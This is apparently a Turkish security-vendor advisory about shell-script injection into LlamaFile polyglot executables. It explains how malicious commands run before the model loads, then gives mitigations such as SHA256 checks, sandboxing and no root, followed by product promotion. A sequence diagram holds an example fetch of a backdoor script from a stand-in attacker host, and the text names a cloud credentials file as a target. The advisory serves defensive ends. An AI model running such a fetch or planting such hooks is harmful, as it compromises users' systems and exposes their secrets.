EresusSecurity
Araştırmalara Dön
Runtime Threats

LlamaFile Binary İşletim Sahteciliği (Shell Overloading) Zafiyeti

Ecenur ÜzeJunior Sızma Testi Uzmanı
10 Nisan 2026
Güncellendi: 27 Nisan 2026
7 dk okuma

Genel Bakış

Makine öğrenimi yaygınlaşırken LlamaFile isimli teknoloji harikası, yapay zeka sektörüne bambaşka bir esneklik getirmiştir. Hem llama.cpp mimarisini, hem de modelin devasa verilerini (GGUF) devasa tek bir dijital gövdede (executable) toplar. Cosmopolitan Libc sistem komutları entegre edildiği için yazılımcınız MacOS, Windows ya da Linux fark etmeksizin saniyesinde tek bir konsol emriyle (./llava-v1.5.llamafile) çalıştırıp donanımına yepyeni bir YZ platformu kazandırabilir.

Ancak ortada ölümcül bir tehlike zinciri mevcuttur. Eresus Sentinel sistemlerinde karşınıza çıkan PAIT-LMAFL-300 uyarısı; Llamafile sisteminizin bu harika "Çok Biçimlilik-Polymorphism" özelliğini (Aynı anda hem çalıştırılan binari kodu hem de kabuk betiği olarak anılabilme halini) lehine çevirerek siber bir kancaya (Shell script injection) ulaştıran tehlikeyi sezip bertaraf etmiştir. Dosya okunma sırasını manipüle ederek daha kod sistemi yapay zekaya devretmeden evvel işletim sisteminizde en saf haliyle rastgele yıkıcı siber komutlar yazar.

İkili Form Dosyalarındaki Hilelerin Ciddiyeti

Bir YZ projesi ekibi aslen AI modellerini indirip kullanırken ona "düşünme harici" zararlı eylem yaratamayacak matematiksel obje gözüyle otonomi tanırlar. Dosya doğası gereği .llamafile eyleme geçerken tamamen kurbanın cihazı ve ortam gücü yetkisindedir. İşletim sistemi ilk betiği okurken sahte kısmı (Shell Commands) görür bunu gerçek AI kodlamasının (bootstrapping environment) mecburi doğası sanar ve bilgisayar korsanına tam otorite RCE sızıntısını anınsa bahşeder.

Saldırı Nasıl Gerçekleşiyor (How The Attack Works)

Hassas sınırları ya da devasa şifreli dilleri kırmalarına gerek yoktur. Tek hedefleri, YZ kabuğunu başlatan basit yazılım sırasının arasına bir dizi gizli terminal komutu gizleyerek kurban cihaza işletmektir.

sequenceDiagram
    participant OS_Terminal as Kurban Cihazın Terminali / Cmd'si
    participant Executable as `.llamafile` İşletim Katmanı
    participant Malicious_Script as İçeri Kodlanan Virüslü Operasyon
    participant GGUF_Engine as Yapay Zeka Model Yükleyicisi

    OS_Terminal->>Executable: Kurum personeli otonomiden modeline emreder: `./wizardcoder.llamafile` 
    Executable->>Executable: Terminal okuyucusu önce dosyanın başındaki "Kabuk metni" satırlarına girer
    Executable->>Malicious_Script: Okunmaması gereken korsan script komutlar saniyeyle aktive olur
    Malicious_Script->>OS_Terminal: Arka kapıyı açan (`curl hacker.com/backdoor.sh`) sistem logunu işletir
    Malicious_Script->>GGUF_Engine: İşi biten truva atı görevleri asıl kod parçalarına (Model yükleyicisine) gizler  
    GGUF_Engine->>OS_Terminal: Bilgisayarda harika çalışan normal bir model açılır (Olay Farkedilmez)
    OS_Terminal-->>Attacker: RCE (Sızma) sağlandığı için sistem karanlık komuta bağlarla teslim edilir.

Önemli Noktalar

  • Kusursuz Kamuflaj (Sembiyoz Gerçeklik): LlamaFile sızıntısındaki şeytani deha buradadır. Bilgisayarda AI modeli hatasız açılır ve yanıt üretir. Korsanın "işletim sistemini basan" script kurgusu model yüklenmeden milisaniyeler öncesinde gerçekleşip ana bilgisayara kaynadığı ve sırayı gerçek sisteme ilettiğinden kullanıcının çıplak gözle hissetmesi mucizedir.
  • Hazır Teslimat Sistemi: ".llamafile" yapısını kurban zaten doğal şekilde root (executable chmod +x) dizgesi vererek onaylar ve kodların sarsıcı komut yazmasına elleriyle "Tüm güvenlik duvarlarını" ve korumalarını aş yetkisi dikte etmiş olur.
  • İmza Tarayıcılarını Kandırma: Birleşik formlu yazılım katmanları karmaşıktır. Mevcut antivirüs (EDR scan) makalesindeki yazılımlar 5 Gigabaytlık kocaman C++ dizgelerinin ucundaki ufacık Linux komut satırlarını ayırt edemez çünkü onun kendi program işleyiş metodu sanar.

Etkisi

Zehirlenmiş bir .llamafile algoritmasına sunucu izni vermeniz bilgisayarınızdaki Konsol Yürütme Motoruna tamamen limitsiz rastgele "Konsol Virüsü (ACE)" ateşlenmesiyle neticelenir. AI motorları çok seri ve yoğun Edge deploy (Donanıma yakın) cihazlarına çok uzak mesafelerden bağlandığından korsan anında kurumsal şifre depolarınıza (~/.aws/credentials) köprü açar. Bilgisayar ağlarını eleştirebilir (Mapping topologies) yahut yansıtılmış sisteminizin içinde siber şirket ajanınızmış gibi (Conversational Framework C2) kurumunuzun devasa metin verilerine sınırsız ihlal sunar.

En İyi Çözüm Pratikleri

  • Kırılmaz Sağlamlık (Checksum Validator): Aslen manuel okunup taranması epey zor olan .llamafile yapılarını şirket bulutunuzda yozlaşmasını tek engelleme garantisi doğrudan SHA256 şifreleridir. Mozilla'nın veya Hugging Face platformunun orijinal "Hash Kriptografi Formülünü" eşleşmeyene kadarıyla cihazınıza tek satır Executable kural asmayı tamamen kurumsallarca bloklayın.
  • Derin Güvenlikli Kapsüller Kurun (Strict Sandbox Deployments): Yapay Zekayı yerel cihaza kurmak caziptir ama izole konterner (Docker kısıtı) içine koymak zorunluyuzdur. Model kodlarını salt (salt-okunur / Read-Only) olarak sunarak ortamda internet ağ geçidi portası bağlarını (--network none) kurup içeriğine konan arka kapı sızıntılarını kitleyin.
  • Ana Komut İşlemcisinden Kopartın (Disable Sudo Native/Root): "Hiçbir koşul altında" ve hiçbir AI otonom kural kodunu devasa sunucu idaresinde (Root-Sudo privileges) yetkilerle kurgulanmamalıdır! Sanal alan AppArmor koruma filtrelerine alınmalıdır.

İyileştirme (Remediation)

Arayüzünüze düşen PAIT-LMAFL-300 uyarısı; Eresus platform algoritmalarınızdaki o harika güvenlik zinciri radarlarının "LlamaFile" sistem siber ayar dizgisi içerisine yerleşmiş ve sıra dışı "işletim komutları fırlatmaya yatkın" virüs şemasını havada imha ettiği manasına gelir. Geri dönüp işletim katmanlarının köprüsünü donanım ortamlarından hemen tecrite yollayın. Cihaz node yapısını karantinaya alıp, arka kapıya çıkış kopyalığının logları kopyalanamadan engellenmiş mi emin olun. Projeyi sahte repolardan sonsuza dek kök tasfiyeden (Expunge) geçirin, mimarinizi resmi donanımı izole eden orijinal onaylanmış "LlamaFile" platform referans dosyalarıyla baştan kurgulayın.

İleri Okumalar ve Kaynaklar (Further Reading)

Güvenlik mimarilerindeki entegre derlenmiş işletim sistem dosyası yetkinliklerinizi güçlendiren kritik kurum okumaları:


📥 Eresus Sentinel Çok Katmanlı İşletim Mimarilerine Kanca Testi Yapar! Tam bir devrim niteliği taşıyan ve modelleri çok hızlandıran sistemlerin devasa işlemci ağınızın arasına rootkit bombalarına dönüşmesini seyretmek zorunda değilsiniz. Eresus Sentinel, karmaşık Llamafile (.llamafile) kütüphanenizin hem komut betiklerinin hem LLLM yapılarını anında otonomla eşleştirerek matematik analizine alır. Beklenmeyen C++ manipülasyon emirlerini ve arka plandan atılan şüpheli sistem RCE tetikleyicilerini terminal çalışmadan sonsuza den bloklar. Donanımlarınıza en üst güvenlik otonomisini hemen kurun.

Daha Fazla Bilgi | Demo Randevusu Alın

SSS

Bu risk sadece prompt injection ile mi sınırlı?

Hayır. AI güvenliğinde prompt injection önemli bir başlangıçtır ama tek başına resmi anlatmaz. Retrieval katmanı, tool izinleri, model artefact güveni, loglarda hassas veri, kullanıcı yetkisi ve entegrasyon sınırları birlikte değerlendirilmelidir.

İlk teknik kontrol ne olmalı?

Önce sistemin hangi veriye eriştiği, hangi aksiyonları alabildiği ve bu aksiyonların hangi kimlikle çalıştığı haritalanmalıdır. Bu harita olmadan yapılan test genellikle birkaç prompt denemesinden öteye geçemez.

Ne zaman profesyonel destek gerekir?

AI uygulaması müşteri verisine, iç dokümana, üretim API’lerine veya otomatik aksiyon alan agent akışlarına erişiyorsa profesyonel güvenlik incelemesi gerekir. Bu noktada risk artık model cevabı değil, kurum içi yetki ve veri sınırıdır.

Uygulama Notları

AI güvenliği incelenirken ilk soru modelin ne cevap verdiği değil, sistemin hangi yetkiyle ne yapabildiğidir. Aynı prompt güvenli görünebilir; fakat arka tarafta CRM, dosya deposu, ticket sistemi veya SQL aracı bağlıysa risk seviyesi tamamen değişir.

Pratik değerlendirme için ekip şu dört katmanı ayrı ayrı yazmalıdır:

  • Kullanıcıdan gelen giriş ve sistem prompt sınırları.
  • Retrieval kaynağı, index yetkisi ve hassas veri filtresi.
  • Tool çağrıları, API token kapsamı ve onay mekanizması.
  • Log, izleme, alert ve olay müdahale akışı.

Karar Çerçevesi

AI uygulaması yalnızca metin önerisi veriyorsa risk daha çok veri sızıntısı ve yanlış yönlendirme üzerinden okunur. Uygulama tool çağırıyor, dosya yazıyor, ticket açıyor, ödeme başlatıyor veya müşteri kaydı güncelliyorsa değerlendirme agent runtime güvenliğine döner.

Bu ayrım önemlidir çünkü prompt filtreleri runtime yetki hatasını çözmez. Filtre modeli ikna etmeye çalışır; güvenli runtime ise agent yanlış ikna edilse bile neye erişemeyeceğini belirler.

Profesyonel Destek Eşiği

Aşağıdaki durumlardan biri varsa konu artık yalnızca iç kontrol maddesi değildir:

  • Production verisi veya müşteri hesabı etkilenebilir.
  • Yetki sınırı birden fazla rol ya da tenant üzerinden çalışır.
  • Bulgu zincirlenince veri sızıntısı, kalıcı erişim veya operasyon kesintisi doğurabilir.
  • Ekipte test kanıtını yeniden üretecek ve remediation önceliği çıkaracak zaman yoktur.

Eresus Security bu noktada bulguyu sadece raporlamakla kalmaz; istismar kanıtı, etki analizi, remediation sırası ve retest kriteriyle birlikte ele alır. Böylece ekip “ne açık?” sorusundan “neyi, hangi sırayla kapatmalıyız?” kararına geçer.

Ek Kontrol Soruları

  • Bu risk hangi varlıkları etkiliyor?
  • Hangi kullanıcı rolleri bu akışa erişebiliyor?
  • Aynı sorun başka endpoint veya entegrasyonda tekrar ediyor mu?
  • Bulgunun müşteri verisine etkisi var mı?
  • Loglardan olayın izi sürülebiliyor mu?
  • Düzeltme sonrası retest nasıl yapılacak?
  • Geçici önlem ile kalıcı çözüm ayrıldı mı?
  • İş etkisi teknik ekibin dışında da anlaşılır mı?
  • Benzer hata için önleyici kontrol eklenebilir mi?
  • Ekip bu kontrolü release sürecine bağlayabilir mi?
  • Gerekirse bağımsız doğrulama için hangi kanıtlar hazırlanmalı?
  • Sonraki sprintte hangi iç bağlantı ve servis sayfası desteklemeli?

İlgili Araştırmalar